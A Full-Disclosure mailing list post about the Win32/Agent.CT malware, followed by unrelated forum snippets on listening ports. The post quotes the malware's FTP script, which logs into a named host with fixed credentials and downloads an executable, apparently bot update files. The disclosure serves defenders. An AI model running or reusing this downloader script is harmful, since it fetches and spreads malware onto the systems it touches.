[Full-disclosure] Script from Win32/Agent.CT



I attempted to download this but was dropped by the FTP server.

Host 61.36.242.10 is listening on port 5444 and appears to be hosting bot
update files.

Headers - 220 Serv-U FTP Server v5.0 for WinSock ready...

Script for filedownload is

open 61.36.242.10 5444
user 1 1
get kage . exe <----
quit

Was locked out on my first attempt, password was incorrect. Lock down your
connections now! :)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Re: Best Plan of action for 2 forest.......
    ... PortQry reports the status of a port in one of the following ways: ... ..LISTENING This response indicates that a process is listening on the target ...
    (microsoft.public.windows.server.active_directory)
  • Re: RealVNC
    ... If we are talking about RealVNC it goes this way ... Then there is default Java listening port on port 5800 on the client machine ...
    (microsoft.public.windows.server.sbs)
  • Re: RIP issue with HMC - security violation?
    ... using an UDP port, 520, which would normally imply that there was a Routing ... Information Protocol (RIP) process behind it capable of modifying the routing ... as a "listening" state for the application. ...
    (bit.listserv.ibm-main)
  • Re: Cant join a domain
    ... Attempting to resolve name to IP address... ... TCP port 42: NOT LISTENING ...
    (microsoft.public.windows.server.active_directory)
  • Re: Error with domain trusts - 2003 to 2003
    ... UDP port 3268: NOT LISTENING ... Domain Functional Level Windows 2003 Native ... The outgoing trust was successfully validated. ...
    (microsoft.public.windows.server.active_directory)